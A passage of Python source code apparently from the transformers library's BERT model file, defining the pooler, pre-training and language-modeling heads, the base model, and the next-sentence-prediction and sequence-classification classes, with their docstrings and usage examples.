            hidden_states = layer_outputs[0]
            if output_attentions:
                all_attentions = all_attentions + (layer_outputs[1],)
        # Add last layer
        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)
        outputs = (hidden_states,)
        if output_hidden_states:
            outputs = outputs + (all_hidden_states,)
        if output_attentions:
            outputs = outputs + (all_attentions,)
        return outputs  # last-layer hidden state, (all hidden states), (all attentions)
class BertPooler(nn.Module):
    """Produce a fixed-size representation from the first ([CLS]) token."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.activation = nn.Tanh()

    def forward(self, hidden_states):
        # "Pooling" here is simply: take the first token's hidden state and
        # pass it through a dense layer followed by tanh.
        first_token = hidden_states[:, 0]
        return self.activation(self.dense(first_token))
class BertPredictionHeadTransform(nn.Module):
    """Dense + activation + LayerNorm applied before the LM decoder."""

    def __init__(self, config):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        # config.hidden_act may be a known activation name or a callable.
        if isinstance(config.hidden_act, str):
            self.transform_act_fn = ACT2FN[config.hidden_act]
        else:
            self.transform_act_fn = config.hidden_act
        self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)

    def forward(self, hidden_states):
        transformed = self.transform_act_fn(self.dense(hidden_states))
        return self.LayerNorm(transformed)
class BertLMPredictionHead(nn.Module):
    """Masked-LM head: transform hidden states, then project to vocab logits.

    The decoder weight is tied to the input embeddings by the surrounding
    model; this module only owns a per-token output bias.
    """

    def __init__(self, config):
        super().__init__()
        self.transform = BertPredictionHeadTransform(config)
        self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
        self.bias = nn.Parameter(torch.zeros(config.vocab_size))
        # Link the bias to the decoder so `resize_token_embeddings` resizes
        # both together.
        self.decoder.bias = self.bias

    def forward(self, hidden_states):
        return self.decoder(self.transform(hidden_states))
class BertOnlyMLMHead(nn.Module):
    """Wrapper exposing only the masked-LM prediction head."""

    def __init__(self, config):
        super().__init__()
        self.predictions = BertLMPredictionHead(config)

    def forward(self, sequence_output):
        return self.predictions(sequence_output)
class BertOnlyNSPHead(nn.Module):
    """Wrapper exposing only the next-sentence-prediction classifier."""

    def __init__(self, config):
        super().__init__()
        # Binary classifier over the pooled [CLS] representation.
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, pooled_output):
        return self.seq_relationship(pooled_output)
class BertPreTrainingHeads(nn.Module):
    """Both pre-training heads: masked-LM scores and NSP classification."""

    def __init__(self, config):
        super().__init__()
        self.predictions = BertLMPredictionHead(config)
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, sequence_output, pooled_output):
        # MLM logits from per-token states; NSP logits from the pooled state.
        return self.predictions(sequence_output), self.seq_relationship(pooled_output)
class BertPreTrainedModel(PreTrainedModel):
    """Abstract base handling weight initialization and the shared
    download/load interface for pretrained BERT models."""

    config_class = BertConfig
    load_tf_weights = load_tf_weights_in_bert
    base_model_prefix = "bert"

    def _init_weights(self, module):
        """Initialize `module`'s weights in place (BERT scheme)."""
        if isinstance(module, BertLayerNorm):
            module.bias.data.zero_()
            module.weight.data.fill_(1.0)
        elif isinstance(module, (nn.Linear, nn.Embedding)):
            # The TF reference uses truncated_normal; plain normal here.
            # cf https://github.com/pytorch/pytorch/pull/5617
            module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
        if isinstance(module, nn.Linear) and module.bias is not None:
            module.bias.data.zero_()
BERT_START_DOCSTRING = r"""
This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general
usage and behavior.
Parameters:
config (:class:`~transformers.BertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the configuration.
Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`transformers.BertTokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.encode_plus` for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Segment token indices to indicate first and second portions of the inputs.
Indices are selected in ``[0, 1]``: ``0`` corresponds to a `sentence A` token, ``1``
corresponds to a `sentence B` token
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`, defaults to :obj:`None`):
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
:obj:`1` indicates the head is **not masked**, :obj:`0` indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
if the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask
is used in the cross-attention if the model is configured as a decoder.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.
"""
@add_start_docstrings(
    "The bare Bert Model transformer outputting raw hidden-states without any specific head on top.",
    BERT_START_DOCSTRING,
)
class BertModel(BertPreTrainedModel):
    """
    The model can behave as an encoder (with only self-attention) as well
    as a decoder, in which case a layer of cross-attention is added between
    the self-attention layers, following the architecture described in `Attention is all you need`_ by Ashish Vaswani,
    Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
    To behave as an decoder the model needs to be initialized with the
    :obj:`is_decoder` argument of the configuration set to :obj:`True`; an
    :obj:`encoder_hidden_states` is expected as an input to the forward pass.
    .. _`Attention is all you need`:
        https://arxiv.org/abs/1706.03762
    """
    def __init__(self, config):
        super().__init__(config)
        self.config = config
        # Embedding lookup, transformer stack, and [CLS] pooler.
        self.embeddings = BertEmbeddings(config)
        self.encoder = BertEncoder(config)
        self.pooler = BertPooler(config)
        self.init_weights()
    def get_input_embeddings(self):
        # Word-embedding table; used by resize_token_embeddings/weight tying.
        return self.embeddings.word_embeddings
    def set_input_embeddings(self, value):
        self.embeddings.word_embeddings = value
    def _prune_heads(self, heads_to_prune):
        """ Prunes heads of the model.
            heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
            See base class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)
    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
    Return:
        :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
        last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`):
            Sequence of hidden-states at the output of the last layer of the model.
        pooler_output (:obj:`torch.FloatTensor`: of shape :obj:`(batch_size, hidden_size)`):
            Last layer hidden-state of the first token of the sequence (classification token)
            further processed by a Linear layer and a Tanh activation function. The Linear
            layer weights are trained from the next sentence prediction (classification)
            objective during pre-training.
            This output is usually *not* a good summary
            of the semantic content of the input, you're often better with averaging or pooling
            the sequence of hidden-states for the whole input sequence.
        hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
            Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
            of shape :obj:`(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
            Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
            :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    Examples::
        from transformers import BertModel, BertTokenizer
        import torch
        tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
        model = BertModel.from_pretrained('bert-base-uncased')
        input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids)
        last_hidden_states = outputs[0]  # The last hidden-state is the first element of the output tuple
        """
        # Per-call flags fall back to the config-level defaults.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")
        device = input_ids.device if input_ids is not None else inputs_embeds.device
        # Default masks: attend everywhere, all tokens in segment 0.
        if attention_mask is None:
            attention_mask = torch.ones(input_shape, device=device)
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
        # We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
        # ourselves in which case we just need to make it broadcastable to all heads.
        extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
        # If a 2D ou 3D attention mask is provided for the cross-attention
        # we need to make broadcastabe to [batch_size, num_heads, seq_length, seq_length]
        if self.config.is_decoder and encoder_hidden_states is not None:
            encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
            encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
            if encoder_attention_mask is None:
                encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
            encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
        else:
            encoder_extended_attention_mask = None
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        embedding_output = self.embeddings(
            input_ids=input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds
        )
        encoder_outputs = self.encoder(
            embedding_output,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_extended_attention_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )
        sequence_output = encoder_outputs[0]
        pooled_output = self.pooler(sequence_output)
        outputs = (sequence_output, pooled_output,) + encoder_outputs[
            1:
        ]  # add hidden_states and attentions if they are here
        return outputs  # sequence_output, pooled_output, (hidden_states), (attentions)
@add_start_docstrings(
    """Bert Model with two heads on top as done during the pre-training: a `masked language modeling` head and
    a `next sentence prediction (classification)` head. """,
    BERT_START_DOCSTRING,
)
class BertForPreTraining(BertPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        # Backbone plus the combined MLM + NSP pre-training heads.
        self.bert = BertModel(config)
        self.cls = BertPreTrainingHeads(config)
        self.init_weights()
    def get_output_embeddings(self):
        # Exposed so the framework can tie the LM decoder to the input
        # embeddings.
        return self.cls.predictions.decoder
    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        next_sentence_label=None,
        output_attentions=None,
        output_hidden_states=None,
        **kwargs
    ):
        r"""
        labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):
            Labels for computing the masked language modeling loss.
            Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
            Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
            in ``[0, ..., config.vocab_size]``
        next_sentence_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`, defaults to :obj:`None`):
            Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring)
            Indices should be in ``[0, 1]``.
            ``0`` indicates sequence B is a continuation of sequence A,
            ``1`` indicates sequence B is a random sequence.
        kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
            Used to hide legacy arguments that have been deprecated.
    Returns:
        :obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
        loss (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
            Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss.
        prediction_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`)
            Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
        seq_relationship_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`):
            Prediction scores of the next sequence prediction (classification) head (scores of True/False
            continuation before SoftMax).
        hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
            Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
            of shape :obj:`(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
            Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
            :obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    Examples::
        from transformers import BertTokenizer, BertForPreTraining
        import torch
        tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
        model = BertForPreTraining.from_pretrained('bert-base-uncased')
        input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)  # Batch size 1
        outputs = model(input_ids)
        prediction_scores, seq_relationship_scores = outputs[:2]
        """
        # Legacy keyword support: `masked_lm_labels` was renamed to `labels`.
        if "masked_lm_labels" in kwargs:
            warnings.warn(
                "The `masked_lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.",
                DeprecationWarning,
            )
            labels = kwargs.pop("masked_lm_labels")
        assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}."
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )
        sequence_output, pooled_output = outputs[:2]
        prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)
        outputs = (prediction_scores, seq_relationship_score,) + outputs[
            2:
        ]  # add hidden states and attention if they are here
        # Total loss is returned only when BOTH label sets are provided.
        if labels is not None and next_sentence_label is not None:
            loss_fct = CrossEntropyLoss()
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
            next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
            total_loss = masked_lm_loss + next_sentence_loss
            outputs = (total_loss,) + outputs
        return outputs  # (loss), prediction_scores, seq_relationship_score, (hidden_states), (attentions)
@add_start_docstrings(
    """Bert Model with a `language modeling` head on top for CLM fine-tuning. """, BERT_START_DOCSTRING
)
class BertLMHeadModel(BertPreTrainedModel):
    """BERT with a causal (left-to-right) language-modeling head.

    Requires ``config.is_decoder=True`` so the underlying :class:`BertModel`
    applies a causal attention mask.
    """

    def __init__(self, config):
        super().__init__(config)
        # Causal LM only makes sense with causal (decoder-style) attention.
        assert config.is_decoder, "If you want to use `BertLMHeadModel` as a standalone, add `is_decoder=True`."
        self.bert = BertModel(config)
        self.cls = BertOnlyMLMHead(config)
        self.init_weights()

    def get_output_embeddings(self):
        # The LM head's decoder is the output-embedding matrix (weight-tied to
        # the input embeddings by the base class machinery).
        return self.cls.predictions.decoder

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=None,
        output_hidden_states=None,
        **kwargs
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
            Labels for computing the left-to-right language modeling loss (next word prediction).
            Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring).
            Tokens with indices set to ``-100`` are ignored (masked); the loss is only computed for
            tokens with labels in ``[0, ..., config.vocab_size]``.
        kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
            Reserved for legacy arguments; must be empty.

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(ltr_lm_loss,)`` when :obj:`labels` is provided, followed by
            ``prediction_scores`` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`
            and the optional hidden states / attentions from the base model.

        Examples::

            from transformers import BertTokenizer, BertLMHeadModel
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertLMHeadModel.from_pretrained('bert-base-uncased', is_decoder=True)
            input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)
            outputs = model(input_ids, labels=input_ids)
            loss, prediction_scores = outputs[:2]
        """
        # Fail loudly on unrecognized keyword arguments (e.g. misspellings of
        # deprecated names) instead of silently discarding them; this matches
        # the behavior of the other Bert* heads in this file.
        assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}."

        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )
        sequence_output = outputs[0]
        prediction_scores = self.cls(sequence_output)
        outputs = (prediction_scores,) + outputs[2:]  # add hidden states and attention if they are here

        if labels is not None:
            # Next-token prediction: score at position i is compared with the
            # token at position i + 1, so both tensors are shifted by one.
            prediction_scores = prediction_scores[:, :-1, :].contiguous()
            labels = labels[:, 1:].contiguous()
            loss_fct = CrossEntropyLoss()
            ltr_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
            outputs = (ltr_lm_loss,) + outputs

        return outputs  # (ltr_lm_loss), prediction_scores, (hidden_states), (attentions)

    def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
        input_shape = input_ids.shape
        # If the model is used as a decoder in an encoder-decoder model, the
        # decoder attention mask is created on the fly.
        if attention_mask is None:
            attention_mask = input_ids.new_ones(input_shape)
        return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings("""Bert Model with a `language modeling` head on top. """, BERT_START_DOCSTRING)
class BertForMaskedLM(BertPreTrainedModel):
    """BERT with a masked-language-modeling (MLM) head on top."""

    def __init__(self, config):
        super().__init__(config)
        # MLM uses bi-directional attention; a decoder configuration would be a mistake.
        assert (
            not config.is_decoder
        ), "If you want to use `BertForMaskedLM` make sure `config.is_decoder=False` for bi-directional self-attention."
        self.bert = BertModel(config)
        self.cls = BertOnlyMLMHead(config)
        self.init_weights()

    def get_output_embeddings(self):
        # Output-embedding matrix, weight-tied to the input embeddings.
        return self.cls.predictions.decoder

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        output_attentions=None,
        output_hidden_states=None,
        **kwargs
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
            Labels for computing the masked language modeling loss.
            Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring).
            Tokens with indices set to ``-100`` are ignored (masked); the loss is only computed for
            tokens with labels in ``[0, ..., config.vocab_size]``.
        kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
            Used to hide legacy arguments that have been deprecated.

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(masked_lm_loss,)`` when :obj:`labels` is provided, followed by
            ``prediction_scores`` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`
            and the optional hidden states / attentions from the base model.

        Examples::

            from transformers import BertTokenizer, BertForMaskedLM
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForMaskedLM.from_pretrained('bert-base-uncased')
            input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)
            outputs = model(input_ids, labels=input_ids)
            loss, prediction_scores = outputs[:2]
        """
        # Legacy alias for `labels`; kept for backward compatibility.
        if "masked_lm_labels" in kwargs:
            warnings.warn(
                "The `masked_lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.",
                DeprecationWarning,
            )
            labels = kwargs.pop("masked_lm_labels")
        assert "lm_labels" not in kwargs, "Use `BertWithLMHead` for autoregressive language modeling task."
        assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}."

        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )
        sequence_output = outputs[0]
        prediction_scores = self.cls(sequence_output)
        outputs = (prediction_scores,) + outputs[2:]  # Add hidden states and attention if they are here

        if labels is not None:
            loss_fct = CrossEntropyLoss()  # -100 index = padding token
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
            outputs = (masked_lm_loss,) + outputs

        return outputs  # (masked_lm_loss), prediction_scores, (hidden_states), (attentions)

    def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
        input_shape = input_ids.shape
        effective_batch_size = input_shape[0]

        # Append a dummy PAD token so the model always has a position to
        # predict for during generation.
        assert self.config.pad_token_id is not None, "The PAD token should be defined for generation"
        if attention_mask is None:
            # Previously a None mask (the parameter's default) crashed in the
            # torch.cat below; default to attending over every input position.
            attention_mask = input_ids.new_ones(input_shape)
        attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
        dummy_token = torch.full(
            (effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
        )
        input_ids = torch.cat([input_ids, dummy_token], dim=1)

        return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
    """Bert Model with a `next sentence prediction (classification)` head on top. """, BERT_START_DOCSTRING,
)
class BertForNextSentencePrediction(BertPreTrainedModel):
    """BERT with the next-sentence-prediction (NSP) binary classifier on top."""

    def __init__(self, config):
        super().__init__(config)
        self.bert = BertModel(config)
        self.cls = BertOnlyNSPHead(config)
        self.init_weights()

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        next_sentence_label=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
        next_sentence_label (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for the next-sequence-prediction (classification) loss. The input should be a
            sequence pair (see ``input_ids`` docstring). Indices should be in ``[0, 1]``:
            ``0`` indicates sequence B is a continuation of sequence A,
            ``1`` indicates sequence B is a random sequence.

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(next_sentence_loss,)`` when :obj:`next_sentence_label` is provided, followed by
            ``seq_relationship_scores`` of shape :obj:`(batch_size, 2)` and the optional
            hidden states / attentions from the base model.

        Examples::

            from transformers import BertTokenizer, BertForNextSentencePrediction
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForNextSentencePrediction.from_pretrained('bert-base-uncased')
            prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
            next_sentence = "The sky is blue due to the shorter wavelength of blue light."
            encoding = tokenizer.encode_plus(prompt, next_sentence, return_tensors='pt')
            loss, logits = model(**encoding, next_sentence_label=torch.LongTensor([1]))
            assert logits[0, 0] < logits[0, 1]  # next sentence was random
        """
        encoder_outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )

        # The NSP head classifies from the pooled [CLS] representation.
        seq_relationship_score = self.cls(encoder_outputs[1])

        outputs = (seq_relationship_score,) + encoder_outputs[2:]  # keep hidden states / attentions
        if next_sentence_label is None:
            return outputs

        next_sentence_loss = CrossEntropyLoss()(
            seq_relationship_score.view(-1, 2), next_sentence_label.view(-1)
        )
        return (next_sentence_loss,) + outputs  # (loss), scores, (hidden_states), (attentions)
@add_start_docstrings(
    """Bert Model transformer with a sequence classification/regression head on top (a linear layer on top of
    the pooled output) e.g. for GLUE tasks. """,
    BERT_START_DOCSTRING,
)
class BertForSequenceClassification(BertPreTrainedModel):
    """BERT with a linear classification/regression head over the pooled output."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.bert = BertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)
        self.init_weights()

    @add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`, defaults to :obj:`None`):
            Labels for computing the sequence classification/regression loss.
            Indices should be in :obj:`[0, ..., config.num_labels - 1]`.
            If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss);
            if :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).

    Returns:
        :obj:`tuple(torch.FloatTensor)`:
            ``(loss,)`` when :obj:`labels` is provided, followed by ``logits`` of shape
            :obj:`(batch_size, config.num_labels)` and the optional hidden states / attentions
            from the base model.

        Examples::

            from transformers import BertTokenizer, BertForSequenceClassification
            import torch

            tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
            model = BertForSequenceClassification.from_pretrained('bert-base-uncased')
            input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0)
            labels = torch.tensor([1]).unsqueeze(0)
            outputs = model(input_ids, labels=labels)
            loss, logits = outputs[:2]
        """
        bert_outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
        )

        # Classify from the (dropout-regularized) pooled [CLS] representation.
        logits = self.classifier(self.dropout(bert_outputs[1]))

        outputs = (logits,) + bert_outputs[2:]  # keep hidden states / attentions
        if labels is None:
            return outputs

        if self.num_labels == 1:
            # A single label means regression: mean-squared error on the raw score.
            loss = MSELoss()(logits.view(-1), labels.view(-1))
        else:
            loss = CrossEntropyLoss()(logits.view(-1, self.num_labels), labels.view(-1))
        return (loss,) + outputs  # (loss), logits, (hidden_states), (attentions)
@add_start_docstrings(
